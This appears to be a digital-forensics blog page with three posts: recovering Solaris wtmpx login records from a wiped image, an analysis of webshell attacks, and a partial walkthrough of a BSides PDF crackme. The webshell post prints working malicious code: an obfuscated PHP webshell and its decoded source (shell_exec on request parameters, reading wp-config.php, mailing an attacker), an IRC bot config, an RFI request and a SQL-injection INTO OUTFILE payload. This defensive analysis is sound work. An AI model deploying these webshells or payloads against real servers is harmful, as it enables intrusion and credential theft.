A few weeks back I was analyzing a Solaris 10 (SPARC) raw partition image and was trying to determine from the wtmpx files who had logged into the system, from what/which remote IP addresses and when. To be more precise, I was tracking nagios account that was used to compromise this machine. The problem I encountered was that the file system was completely wiped out - all files were gone.

Fortunately, this was done at filesystem level with rm -rf / command.

1 2 3 4 5 6 7 8 9 10 11 12
elceef@cerebellum:~$ sudo mount -o loop,ro -t ufs dd_nj090240-var /mnt elceef@cerebellum:~$ ll -R /mnt /mnt: total 6 drwxr-xr-x 3 root sys 1024 jul 1 02:43 ./ drwxr-xr-x 30 root root 4096 aug 4 09:49 ../ drwxr-xr-x 2 root sys 512 jun 28 13:25 run/ /mnt/run: total 2 drwxr-xr-x 2 root sys 512 jun 28 13:25 ./ drwxr-xr-x 3 root sys 1024 jul 1 02:43 ../

This means the data should still be there. But how to recover it?

Solaris wtmpx file format

Solaris uses /var/adm/wtmpx file which is in some way similar to /var/log/wtmp from Linux but unfortunately is incompatible. Also this system is based on SPARC architecture which is big-endian so in contrast to Intel x86 (little-endian) the integers are stored in reverse order. This means we cannot use Linux native tools like last to parse contents of a wtmpx file from Solaris. In order to recover it we need to know the exact structure. The easiest way to understand the format is to look at the source code of programs that read and write to wtmpx files. Since the target system is Solaris, the format is very likely to be found in /usr/include/utmpx.h C include file.

Here is an excerpt from Solaris 10’s utmpx.h:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
struct timeval32 { int tv_sec, tv_usec; }; struct futmpx { char ut_user[32]; /* user login name */ char ut_id[4]; /* inittab id */ char ut_line[32]; /* device name (console, lnxx) */ pid32_t ut_pid; /* process id */ int16_t ut_type; /* type of entry */ struct { int16_t e_termination; /* process termination status */ int16_t e_exit; /* process exit status */ } ut_exit; /* exit status of a process */ struct timeval32 ut_tv; /* time entry was made */ int32_t ut_session; /* session ID, user for windowing */ int32_t pad[5]; /* reserved for future use */ int16_t ut_syslen; /* significant length of ut_host */ char ut_host[257]; /* remote host name */ };

Data carving

Each wtmpx entry is exactly 372-byte long (aligned to 4 bytes!) and it starts with an username trimmed to 32 bytes. Based on this information we can create a pattern for scalpel - well known file carving utility. In this case, we want scalpel to scan for specified string of bytes (header) and then save 372 byte long chunks of data that follow the header. If you want to learn more about the configuration file syntax, I encourage you to review the manual page or the configuration file itself where you will find many examples.

1
wtmpx y 372 nagios\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x74\x73

Let’s run it on the partition image and see the results!

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20
elceef@cerebellum:~$ scalpel -o scalpel_out/ -O dd_nj090240-var Scalpel version 1.60 Written by Golden G. Richard III, based on Foremost 0.69. Opening target "/home/elceef/dd_nj090240-var" Image file pass 1/2. dd_nj090240-var: 100.0% |***************************************************************************************************| 20.0 GB 00:00 ETA Allocating work queues... Work queues allocation complete. Building carve lists... Carve lists built. Workload: wtmpx with header "\x6e\x61\x67\x69\x6f\x73\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x74\x73" and footer "" --> 8 files Carving files from image. Image file pass 2/2. dd_nj090240-var: 100.0% |***************************************************************************************************| 20.0 GB 00:00 ETA Processing of image file complete. Cleaning up... Done. Scalpel is done, files carved = 8, elapsed = 67 seconds.

After a minute the tool carved eight files out of the image.

1 2 3 4 5 6 7 8 9 10 11 12 13
elceef@cerebellum:~/scalpel_out$ ll total 44 drwxrwxr-x 2 elceef elceef 4096 aug 16 05:39 ./ drwxrwxr-x 4 elceef elceef 4096 aug 16 05:36 ../ -rw-rw-r-- 1 elceef elceef 372 aug 16 05:39 00000000.wtmpx -rw-rw-r-- 1 elceef elceef 372 aug 16 05:39 00000001.wtmpx -rw-rw-r-- 1 elceef elceef 372 aug 16 05:39 00000002.wtmpx -rw-rw-r-- 1 elceef elceef 372 aug 16 05:39 00000003.wtmpx -rw-rw-r-- 1 elceef elceef 372 aug 16 05:39 00000004.wtmpx -rw-rw-r-- 1 elceef elceef 372 aug 16 05:39 00000005.wtmpx -rw-rw-r-- 1 elceef elceef 372 aug 16 05:39 00000006.wtmpx -rw-rw-r-- 1 elceef elceef 372 aug 16 05:39 00000007.wtmpx -rw-rw-r-- 1 elceef elceef 963 aug 16 05:39 audit.txt

1 2 3 4 5 6 7 8 9 10 11 12
elceef@cerebellum:~/scalpel_out$ hexdump -C 00000000.wtmpx 00000000 6e 61 67 69 6f 73 00 00 00 00 00 00 00 00 00 00 |nagios..........| 00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000020 74 73 2f 31 70 74 73 2f 31 00 00 00 00 00 00 00 |ts/1pts/1.......| 00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000040 00 00 00 00 00 01 b9 00 00 07 00 00 00 00 00 00 |................| 00000050 55 95 ac bb 00 0a d1 5d 00 00 00 00 00 00 00 00 |U......]........| 00000060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000070 00 0e 31 30 2e 32 30 30 2e 31 32 35 2e 31 34 32 |..10.200.125.142| 00000080 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 00000174

The entries look valid. We can easily spot account name, console and source IP address this session originated from. We miss other important piece of the puzzle: timestamp and event type. We need to write a parser that will allow us to extract detailed information of each event (entry) similar to how last command does.

Parsing

I created a quick and dirty python script that benefits mostly from struct module to handle binary data. This module has a function called unpack() especially designed to parse binary and structured data according to a given format. Format strings are used to specify the expected layout when unpacking data. They are build up from format characters which specify the type and size of data being unpacked. I strongly encourage you to review documention for struct module first in order to understand better the meaning of format characters.

It is worth mentioning that I had to use pad bytes in the format string in order to maintain proper alignment for the futmpx struct involved. Don’t be surprised if your calculations are not in accordance with sizeof(struct futmpx) - this is the way data structures are stored in the memory.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30
#!/usr/bin/env python import struct import sys import datetime def type(x): return { 0: 'EMPTY', 1: 'RUN_LVL', 2: 'BOOT_TIME', 3: 'NEW_TIME', 4: 'OLD_TIME', 5: 'INIT_PROCESS', 6: 'LOGIN_PROCESS', 7: 'USER_PROCESS', 8: 'DEAD_PROCESS', 9: 'ACCOUNTING' }.get(x, 'UNKNOWN') data = open(sys.argv[1], 'rb') while True: chunk = data.read(372) if not chunk: break s = struct.Struct('>32s 4s 32s i H H H b b I I I 5I H 257s b') unpacked = s.unpack(chunk) #TODO: timezone timestamp = datetime.datetime.fromtimestamp(int(unpacked[9])).strftime('%Y-%m-%d %H:%M:%S') print(str(unpacked[0]) + '\t' + str(unpacked[3]) + '\t' + str(unpacked[2]) + '\t' + str(timestamp) + '\t' + str(unpacked[18]) + '\t' + type(unpacked[4]))

Now it’s time to see this code in action. My script takes only a single file as an argument so I use the following command line kung-fu to parse all files (in this case single wtmpx entries) at once and sort by the timestamp:

1 2 3 4 5 6 7 8 9
elceef@cerebellum:~$ for i in $(ls *.wtmpx); do readutmpx.py $i; done | tr -d '\000' | sort -k 4 nagios 257138 pts/1 2015-02-14 04:12:35 10.212.6.160 USER_PROCESS nagios 257138 pts/1 2015-02-14 04:12:35 10.212.6.160 USER_PROCESS nagios 257138 pts/1 2015-02-14 04:15:35 DEAD_PROCESS nagios 257138 pts/1 2015-02-14 04:15:35 DEAD_PROCESS nagios 112896 pts/1 2015-07-02 17:27:23 10.200.125.142 USER_PROCESS nagios 112896 pts/1 2015-07-02 17:27:23 10.200.125.142 USER_PROCESS nagios 112896 pts/1 2015-07-02 17:32:32 DEAD_PROCESS nagios 112896 pts/1 2015-07-02 17:32:32 DEAD_PROCESS

Works like a charm! But there is still area for improvement. This code does not convert the time to the correct time zone. Take this into account before building a timeline.

Happy end

Solving this case would not be possible without this promising technique. The compromised system was configured to keep track of only unsuccessful authentication attempts leaving wtmpx records as the only reliable source of information about the origin of the attack. The person responsible for the destruction of this system was too confident - deleting all files is not enough to cover all tracks. Now personal details of this individual are known and the case is closed. Cheers!

Webshells - every time the same purpose, every time a different story... (part 1)

2015-08-12T11:13:40+02:00

It’s nothing new to say that every moment hundreds of thousands requests with malicious payloads are hitting web servers around the world with bad intentions. Probably you’ve seen it many times in many different forms. I would like to take a deeper look at some of them: webshells.

These attacks are really common nowadays because of the nature of the Internet. Millions of web servers seems to be attractive targets for attackers. When you think about the role of the web servers in the organizations then the attractiveness of such targets is even greater.

Intro - before you start testing your luck

Over the years the Internet has changed. Web servers are not only responsible for displaying simple private or business websites. Development of languages such as JavaScript, PHP, Python or Ruby have already begun to play a significant role in business applications, online shops, internet entertainment, blogs or others. Those applications are often created using off the shelf products accessible to the rest of the world which results in numerous vulnerabilities. Who didn’t hear for instance about another vulnerability in Wordpress or phpBB recently? Such popular web applications have become the main target for the groups trying to build their botnets or spread malware. When another 0-day is published, the attackers try to obtain access to victim machines on a large scale. They start massive scanning for vulnerabilities as long and wide the Internet is. Some of attacks aimed at the web servers, can be more severe if web server become a gateway to the internal infrastructure - more on that later.

First act - try and you might get lucky today

I’m going to present three different examples how attackers try to bypass security measures and upload webshells on target systems - including RFI (Remote File Inclusion) and SQL injection.

Hiding webshell code inside the well-known file format

Below is a log entry presenting an attempt to execute code using RFI vulnerability.

1 2 3 4
Path: GET /B=1&From=remotelogi‌n.php&L=hebrew&Last‌Check=http://sxxxxxxo.no/byroe.jpg?? Source IP: 185.X.X.53 GEO: MADRID ES , Onestic_Innovacion_y_Desarrollo_SL , singularcomputer.es

Many of the common RFI exploit scripts, as well as attack payloads sent by hackers append the ? symbol to the included (malicious) URL. In order to avoid the issues with developer supplied strings appended to the URL by the application. It is similar to SQL injection utilizing comment specifiers (--, ;-- or #) at the end of their payloads.

Attacker tried to trick the web application to include a JPG file from the remote server. Is it really a JPG image? Let’s take a closer look:

1 2 3 4 5 6
0000000: 4749 4638 3961 013f 013f 3f3f 3f3f 3f3f GIF89a.?.??????? 0000010: 3f3f 3f21 3f04 013f 3f3f 3f2c 3f3f 3f3f ???!?..????,???? 0000020: 013f 013f 3f44 013f 3b3f 3c3f 0d0a 0d0a .?.??D.?;?0000030: 7365 745f 7469 6d65 5f6c 696d 6974 2830 set_time_limit(0 0000040: 293b 200d 0a65 7272 6f72 5f72 6570 6f72 ); ..error_repor 0000050: 7469 6e67 2830 293b 200d 0a0d 0a63 6c61 ting(0); ....cla

As you can see above, it’s not an image at all - although it contains a valid GIF file header. Trustwave has an interesting blog post that provides more details on how attackers can hide malicious code in the image files. Let’s analyze the beginning of the PHP code:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23
GIF89a^A?^A??????????!?^D^A????,????^A?^A??D^A?;? set_time_limit(0); error_reporting(0); class pBot { var $config = array("server"=>"irc.malink.biz", "port"=>"6667", "pass"=>"on", //senha do server "prefix"=>"MalinK-", "maxrand"=>3, "chan"=>"#maza", "key"=>"on", //senha do canal "modes"=>"+p", "password"=>"on", //senha do bot "trigger"=>".", "hostauth"=>"Tukang.sapu " // * for any hostname ); var $users = array(); function start() { ...

Class pBot defines an array with all the config information. Probably server and port fields caught your attention as it provides information about C&C that potential bot will be trying to communicate to. Before we check what is behind the irc.malink.biz, I would like to know something more about domain malink.biz itself. Using Passivetotal service we can check the history of that domain and actual whois records.

Owner from USA with all personal data available?! Is this what you would expect from suspicious domain? Maybe a homepage will give us some answers…

nothingsecure…OK, now it seems to be more logical :) Info from IRC is also giving clear answer about intentions:

Ok, so let’s take another step forward and focus on irc.malink.biz.

1 2 3 4
irc.malink.biz. 14384 IN A 195.30.107.222 irc.malink.biz. 14384 IN A 109.74.203.175 irc.malink.biz. 14384 IN A 167.114.67.197 irc.malink.biz. 14384 IN A 167.114.68.120

They care about failover ;)

To sum up geo - server in Paris received a crafted request from host in Madrid with a link to the domain sxxxxxxo.no (Columbus, OH) to download a file byroe.jpg with embedded webshell. Inside of the file, we found IRC server irc.malink.biz which resolves to more than one IP - load balancing DNS records using round robin method (Germany, UK, Canada).

How does it look like ? :)

Virustotal confirms AV detection rates seems not too bad. At this point, it’s worth to mention that it’s NOT good to upload any files to VT as a first step of the analysis. Start with OSINT research. For example, before you upload the file, check if file’s hash is not already stored in VT database. Sharing potentially malicious files (remember that VT database is public!) might warn an attacker and give him a chance react quickly.

Images are not the only way how attackers try to bypass the WAF.

Hiding webshell using code obfuscation

The attackers might try to hide their intentions by encoding and compressing the malicious code. This allow to bypass some of the filters and signatures used by WAFs. Another RFI attack:

1 2 3
Path: GET /src=http%3A%2F%2Fim‌g.youtube.com.vxxxxxxxd.org%2Fmyluph.php Source IP: 93.X.X.206 CEO: AMSTERDAM NL , Digital_Residence_B.V. , curhosting.com

Content of the suspicious file:

1
eval(gzinflate(str_rot13(base64_decode('rUp6Yts2EP68APkPDHhANppV7pZvg3B7zRxsZNvYmeUMA5JAoCTacyORglXF8YL89x0pyS/Ny9KiToDY9/rcw+MdULNZcX5TRpEpxnT1c+N1aodaRH2PVlZIveZ7rucNU8NYKyBfyI1o3XX8Z7+7RrtykqlD5FyhDneCRnpOA/ioHcZ/u+NYfDqZnPunI2KCr7Wa8S9b6rH714XrWvyL8aAwCFG0BAtZIoKWhM8Qa9BDoSuuUHh/rM0kmdKkGUQw/cA483SA0tJPPxERtUn4SoYNZ1+TNMwzppYQ3jvuu/7Z6MSFAKN+Hx897O7QS9IXrIZgcUXTLKVMBzLOhUfBkpOE1koVTMVf//jkcQw0lTXTGyUyCPKc09g9G1rcDaeEsLiOgXuREX7YPPww0xI7FAneVNiwhPfxKZEsU3/oIyEczZVXW45G8QSMSKVc8cE58nVpWDWIsoIrjkA6MPSKDMQVQXlDPzry8oTXUT2ya/vWMMSm9ap6/mcnl0kYC0Foy+iOkSLPT7rZA5bXGw/OJ35/8NkdHp+5lumDiFfFQ3R6aDLqXZy5w4k/Ho0m1rWNnVJtkIpR2Ok81T2R0YLUIsM+Kk80Csg/sG5Nr3eYSdEwYBTOBcJ6xUdZu4GY0RgdIG2XxoKptkaI207W1SWUtkYB91ayf3bnFxSKGA7nWr/ff++63UJHsRuCPDInAUToI4kYHD+fVviy9+oocie0EMtPO4hWa5NmaXTnEv3aeTZfH1MRBT4tJHuEZjqGirXvs/4/r/0hWhMMu9hesXTjthOsnHgg9GZ11A6ucBsOywcBnLAywm3Dxo3X5riQptacUh0TKUzCVIiwV25wNFsrdF8rN269Kp9hUFWIaHD6uXbKxmmYds5QxQRU6QKSIX0vwlJHzIdDi4pbR8s7RXJMKnFd6/ctxzKXyKj2tC6m3KgaB++0IqMqzzjSEhuMqx6935CbG03Kn1dkaPUtOcD6+SRyIlqZBZRyCVf0+AOmz/U+QMRj0MG4+zKhPZEkhFQVgXrG01whtVl2ByttpzDSHGpjmFFrW+vlTsLW+iIOU7ckzuE7/SfMFQUXVIPrTVTbYCmckYmS5LFvKcmUsTuIiCIV+KoiXdD/R2QBN55RqM9vdypktPWjguYsiigvAcsC/pbBFPxYtWFC/RWXOX8ror2Ib1UXxruFNk55xNeEFt7v3pdsOF3oDxiFMZGyo8iWUAGy1OFAregtCt6ianAzdcYurcK52g258YiYXkXp+hrs1QyOyqeEA0H3U25piV4e3qVIRG9dg50xMq2YiFvqF9F25HiD+pMuKlb9wg3WxwqNetKUYH5VKF16MVeqroDlQSM9Gh5DsUjQlt7Lw5BXiRSI7K/Dwfx3nSB8hB7MhXtRZdn3FctjWgxypTKJzMItJ1ua0e4LIx/bZUHj2KdqNKzrVXOwFVrkdV+8NV22nwHJGoIoMawV3wtOfBMGmahn9RKBzwBPH5hiFgxRgAUjbt/YDvzC8wJRRjYzD4xTBdD4er6D0Grgtm+JDm9vPQe9iBgCHLpoow+/CvqRLFZZ5uh2E2bpB8OT0RPqxZwp2h263uAYvZDgRt5pVxga2+/d3Z1pzPgNGrufbr6ejsaT3sUEDW3w2k6ncLffweUzZ7FL2GPx88TOBLQfg7fYAeMRPAUlI/oh62sJQ7+UQVGnBFOsE/h4/Yxa9eTQqWB56f8JgkyBDL92mh+t1orufw==')))); ?>

This is a typical example of obfuscated PHP code. It will be passed to the eval() function for execution, but before that it needs to be:

base64 decoded

ROT13

inflated

There is also a more troublesome version of this. Imagine multiple layers of obfuscated code using the same functions as presented before. Obtaining the original code requires repeated decoding, so manual work with the PHP interpreter ceases to be comfortable. In case you stumble upon such sample then I suggest to use phpdecoder.

Here’s the code after deobfuscation:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70
error_reporting(0); if (!isset($_SESSION['bajak'])) { $visitcount = 0; $web = $_SERVER["HTTP_HOST"]; $inj = $_SERVER["REQUEST_URI"]; $body = "ada yang inject \n$web$inj"; $safem0de = @ini_get('safe_mode'); if (!$safem0de) {$security= "SAFE_MODE = OFF";} else {$security= "SAFE_MODE = ON";}; $serper=gethostbyname($_SERVER['SERVER_ADDR']); $injektor = gethostbyname($_SERVER['REMOTE_ADDR']); mail("setoran404@gmail.com", "$body","Hasil Bajakan http://$web$inj\n$security\nIP Server = $serper\n IP Injector= $injektor"); $_SESSION['bajak'] = 0; } else {$_SESSION['bajak']++;}; if(isset($_GET['clone'])){ $source = $_SERVER['SCRIPT_FILENAME']; $desti =$_SERVER['DOCUMENT_ROOT']."/wp-pomo.php"; rename($source, $desti); } $safem0de = @ini_get('safe_mode'); if (!$safem0de) {$security= "SAFE_MODE : OFF";} else {$security= "SAFE_MODE : ON";} echo "bogel - exploit "; echo "Ketika Sahabat Jadi Bangsat ! "; echo "Server : irc.blackunix.us 7000 "; echo "Status : sCanneR ON "; echo "".$security." "; $cur_user="(".get_current_user().")"; echo "User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user." "; echo "Uname : ".php_uname()." "; function pwd() { $cwd = getcwd(); if($u=strrpos($cwd,'/')){ if($u!=strlen($cwd)-1){ return $cwd.'/';} else{return $cwd;}; } elseif($u=strrpos($cwd,'\\')){ if($u!=strlen($cwd)-1){ return $cwd.'\\';} else{return $cwd;}; }; } echo 'Command '; echo 'Upload File New name: '; if(isset($_POST['submit'])){ $uploaddir = pwd(); if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];}; move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name); if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){ echo "Upload Failed"; } else { echo "Upload Success to ".$uploaddir.$name." :D "; } } if(isset($_POST['command'])){ $cmd = $_POST['cmd']; echo "".shell_exec($cmd)." "; } elseif(isset($_GET['cmd'])){ $comd = $_GET['cmd']; echo "".shell_exec($comd)." "; } elseif(isset($_GET['smtp'])){ $smtp = file_get_contents("../../wp-config.php"); echo $smtp; } else { echo "".shell_exec('ls -la')." "; } echo "Jayalah INDONESIA Ku"; ?> REL="SHORTCUT ICON" HREF="http://www.forum.romanisti-indonesia.com/Smileys/default/b_indonesia.gif">bgcolor="#000000">

First part of the code is sending email confirmation about infection to setoran404@gmail.com. After that there is a code responsible for command execution on infected system and printing output on the page. “Production” example found on the Internet:

As you can see an attacker uploaded a few more “add-ons” like Mailer-1.php, Mailer-2.php, 1337w0rm.php etc.

Again I use VirusTotal to check AV detection ratio:

This time not so good - most of AV engines did not recognize file as suspicious.

Delivering webshell using SQL Injection

Take a closer look at the following example:

1
UNION SELECT NULL,"", NULL INTO OUTFILE "/var/www/webshell.php" --

First of all attacker needs a SQL Injection vulnerability. Next a specially crafted request will inject PHP code which will be saved on the server.

Explanation:

1
($_REQUEST['cmd']); ?>

This is a simple webshell that will be used to execute commands on the web server. Depending on the SQL injection vulnerability attacker needs to place it in appropriate column. In this example the table has three columns. Code will be placed in the second one with others set to NULL.

1
INTO OUTFILE

This SQL command allows attacker to write the webshell code to an arbitrary file.

1
"/var/www/webshell.php"

Path where webshell will be stored. Important thing to note is that attacker needs to find directory on the server with write access e.g. temporary folders. In addition to that crooks have to find a way to force application to execute webshell script in this case this can be achieved via LFI. Following example includes all the above dependencies.

After executing the SQL query the webshell file is created. Now the attacker can interact with the webshell by simply sending a HTTP GET request and defining the following URL:

1
http://www.vulnerablesite.com/webshell.php?cmd=ls

The directory listing of /var/www will be returned by the server. Et voilà!

At the end, check how VirusTotal looks for that simple one-line webshell:

Perfectly invisible ;)

If you would like to read or watch more, take a look at article on greensql or YouTube movie.

With three brief examples we’ve just scratched the surface of this interesting topic. There are many other different ways to place and execute arbitrary code on a remote server and interact with OS. In the second part I’d like to focus on a case which shows how dangerous webshells can be for a business infrastructure and describe methods to protect against them.

Toxic PDF Walkthrough - BSides London Challenge

2015-07-18T19:30:38+02:00

Unfortunately I wasn’t able to attend BSides London this year - otherwise there would probably be a DFIR.IT on Tour entry somewhere on the blog. Recently I haven’t got a lot of time to play with any DFIR challenges but when one of the guys at work mentioned about BSides Toxic PDF I decided to give it a try.

The door

Toxic PDF instruction states: “Don’t be afraid to walk through the door (if you can)…”

After opening the crackme.pdf the following screen appears:

Door would open only when correct key is entered. But where can we find the key?

Whenever I need to analyze maldocs, malicious scripts, phishing emails my go-to platform is REMnux. I can’t emphasize how cool it is to have all the tools for reversing and malware analysis at one place!

Let’s crack on with the PDF analysis. For this we’ll use great tool peepdf created by Jose Miguel Esparza.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32
remnux@remnux:~/Desktop/PDF-B$ peepdf -i crackme.pdf File: crackme.pdf MD5: 9a8e90fb547d8fd3c865ed74782af600 SHA1: b47f676fb46138273aa25609b1f8a9537605e3b6 Size: 127257 bytes Version: 1.7 Binary: True Linearized: False Encrypted: False Updates: 0 Objects: 46 Streams: 23 Comments: 0 Errors: 0 Version 0: Catalog: 1 Info: 3 Objects (46): [1, 2, 3, 4, 5, 6, 7, 8, 9, 14, 15, 16, 190, 191, 192, 264, 265, 266, 273, 274, 282, 283, 299, 300, 325, 326, 327, 334, 335, 373, 374, 375, 376, 518, 530, 531, 532, 533, 577, 578, 579, 879, 880, 904, 913, 914] Compressed objects (21): [192, 577, 2, 3, 5, 6, 7, 264, 9, 266, 299, 300, 14, 879, 16, 579, 518, 373, 327, 190, 325] Errors (3): [374, 880, 904] Streams (23): [8, 15, 191, 265, 273, 274, 282, 283, 326, 334, 335, 374, 375, 376, 530, 531, 532, 533, 578, 880, 904, 913, 914] Xref streams (1): [914] Object streams (1): [913] Encoded (23): [8, 15, 191, 265, 273, 274, 282, 283, 326, 334, 335, 374, 375, 376, 530, 531, 532, 533, 578, 880, 904, 913, 914] Decoding errors (1): [374] Objects with JS code (2): [880, 904] Suspicious elements: /AcroForm: [1] /AA: [913, 264, 14] /JS: [913, 299, 879] /JavaScript: [913, 299, 879]

Usually when analyzing malicious PDF documents objects like AcroForm, AA(Additional Actions) or JavaScript are the the most interesting to look at. As object 913 is on both AA and JS lists it seems to be a good starting point.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47
PPDF> object 913 << /Length 1065 /N 21 /Type /ObjStm /Filter /FlateDecode /First 163 >> stream 2 0 3 37 5 182 6 419 7 530 9 602 14 635 16 882 190 915 192 1164 264 1197 266 1534 299 1555 300 1596 325 1611 327 1922 373 1943 518 2214 577 2229 579 2411 879 2432 <[ 4 0 R ]>> <(Foxit PhantomPDF - Foxit Software Inc.)/Author(liv)/Title(Untitled)/CreationDate(D:20150308153143)/ModDate(D:20150315133057+00'00')>> <(D:20150308153155+00'00')/Rect[ 161.487 717.47 450.513 760.867]/BS <>/DA(/Helv 0 Tf 0 0 0 rg)/AP<8 0 R >>/V(Knock! Knock! Anybody there?)/DV(Knock! Knock! Anybody there?)/T(msg)>> <7 0 R >>>>/DA(/Helv 0 Tf 0 g)/Fields[ 14 0 R 5 0 R 190 0 R 264 0 R 325 0 R 577 0 R ]>> <> <7 0 R /FXF0 7 0 R >> <(D:20150308153501+00'00')/Rect[ 188.362 683.035 423.638 708.979]/BS <>/DA(/Helv 0 Tf 0 0 0 rg)/AP<15 0 R >>/T(pass)/MK <[ 0.25098 0 0.12549]>>/Q 1/MaxLen 50/V(123)/DV(1)/AA 518 0 R >> <7 0 R /FXF0 7 0 R >> <(D:20150308184228+00'00')/Rect[ 256.965 600.958 256.965 602.373]/BS <>/DA(/Helv 0 Tf 0 0 0 rg)/AP <191 0 R >>/V(9053d91a70acfd6614f0243caac70ce2)/DV(9053d91a70acfd6614f0243caac70ce2)/T( %e)>> <7 0 R /FXF0 7 0 R >> <(D:20150314181444+00'00')/Rect[ 236.219 401.896 372.009 655.204]/MK <[ 0.752941 0.752941 0.752941]/AC(test)/TP 1/IF<true/SW/A/A[ 0.5 0.5]>>/IX 283 0 R /I 274 0 R >>/BS <>/H/N/DA(/Helv 0 Tf 0 0 0 rg)/AP<265 0 R >>/T(door)/AA 300 0 R /TU(Click to open the door!)>> <7 0 R >><904 0 R >><299 0 R >> <(D:20150314183524+00'00')/Rect[ 236.804 400.953 371.652 654.733]/MK <[ 0.752941 0.752941 0.752941]/TP 1/IF<true/SW/A/A[ 0.5 0.5]>>/I 335 0 R /IX 533 0 R >>/BS <>/H/P/DA(/Helv 0 Tf 0 0 0 rg)/AP<326 0 R /R 530 0 R /D 531 0 R >>/T(door2)>> <7 0 R >> <[ 496.955 602.865 577.955 685.865]/Subtype/Screen/P 4 0 R /M(D:20150314185841+00'00')/F 4/NM(31cede6f-f679-47c0-a8a9-d8eefad3b763)/IT/Img/BS<>/MK <[ 0 0 1]/R 0/I 375 0 R /IF<false/SW/A/A[ 0.5 0.5]>>>>/CA 1/C[ 0 0 0.003922]/AP <376 0 R >>>> <879 0 R >> <(D:20150314200638+00'00')/Rect[ 145.692 263.686 466.308 358.971]/BS <>/DA(/Helv 0 Tf 0 0 0 rg)/AP<578 0 R >>/T(366)>> <7 0 R >><880 0 R >> Endstream

Based on the above output we can see that Click to open the door action is handled by JavaScript object 904. This may include some sort of password validation code:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61
PPDF> js_beautify object 904 function vv56(h3m, n7) { return h3m + n7; } function mz821a(hu4, v9) { return v9[hu4] } function mmu7d(kjj, y7, y8) { var kmn6 = y7 % kjj.length; var s = ""; while (s.length < kjj.length) { s += mz821a(kmn6, kjj); kmn6 = (kmn6 + y8) % kjj.length; } return s; } var hnam4 = mmu7d("49%68%DC%79%C9%29%D8%DD%E9%19%4D%D9%18%9D%29%BD%19%B9%AC%3D%F9%C8%F8%09%8C%E8%E9%99%C8%FA%E9%78%9A%99%89%48%79%99%38%19%DD%C8%E8%89%D8%C9%7D%49%29%18%88%38%78%F8%18%9D%6D%C9%DD%99%E9%9D%E9%49%89%9D%9D%89%88%08%9D%38%E8%89%F9%FB%99%8C%D9%C8%48%89%39%DD%A9%8D%E8%6B%99%5D%18%88%D8%E8%1D%F8%39%39%2D%D8%39%3D%0D%DD%DD%EB%F9%59%AD%09%88%69%E8%E9%FC%38%8D%DD%C8%DD%EA%C9%19%19%F9%78%09%A9%FD%B8%C9%A8%DD%89%49%DD%DD%DD%DB%49%49%CB%D9%E9%FC%E8%B9%1C%6D%FC%D9%D9%9D%DD%A9%C9%1D%CD%A9%0A%59%28%DD%E8%29%E9%5D%49%3D%F8%D8%CC%48%29%99%48%28%4C%78%DA%", 199154, 198821); var as6z = mmu7d("%ED%B9%C9%08%38%E8%29%89%89%68%A9%28%DD%2C%8D%9C%AB%8B%89%9D%FD%F9%E9%ED%58%F8%ED%8D%D9%59%19%49%C9%BD%39%19%1D%9B%9u%B8%4D%B8%C9%E9%8D%DD%D9%09%F9%F8%B9%B8%BC%49%D9%C9%A9%4D%6D%99%D9%DD%88%C9%28%A9%A8%DB%39%48%6C%ED%28%F8%38%E8%19%4D%59%5D%49%4D%3D%99%3C%89%79%98%C9%5D%BD%3D%49%88%8D%5D%6D%C9%98%C9%B9%09%49%D9%09%D95E9%F8%98%99%49%F9%3D%F8%3D%FD%5D%89%69%8D%9D%D8%99%38%3D%49%4B%99%DC%F9%F8%89%E9%19%C8%59%99%9D%59%59%88%E9%89%18%A9%1D%3D%98%D8%4D%F8%49%49%DD%DD%F9%39%F9%38", 334776, 334478); function mns51() { if (this.secret === undefined) { return mmu7d("mfoCr", 3436, 3438); } return mmu7d("omfrB", 527, 528); } function alopre7(no, uv) { var yg1; yg1 = mns51(); return mz821a(yg1 + no, uv); } function enx(u7b, i8uy) { var coded = ""; var f = alopre7(mmu7d("ohCerda", 5748, 5752), String); for (var i = 0x39 + 3 + ~ - ~ - ~57; i < mz821a(mmu7d("elhtgn", 5071, 5075), u7b); i++) { coded += f(u7b[mmu7d("dtaoAhCecr", 8828, 8827)](i) ^ i8uy); } return coded; } function ty32() { return mz821a(mmu7d(vv56("a", "v") + "el", 2470, 2471), mz821a(mmu7d("ratteg", 4898, 4901), event)); } var my6 = ty32(); function dsm33() { return my6(mmu7d("nuepacse", 6169, 6175)); } var h7 = dsm33(); my6(enx(h7(as6z + hnam4), 0xFD));

Obfuscated code! That looks suspicious. Let’s dump it and look if we can deobfuscate the code.

1
PPDF> js_beautify object 904 > 904

The key

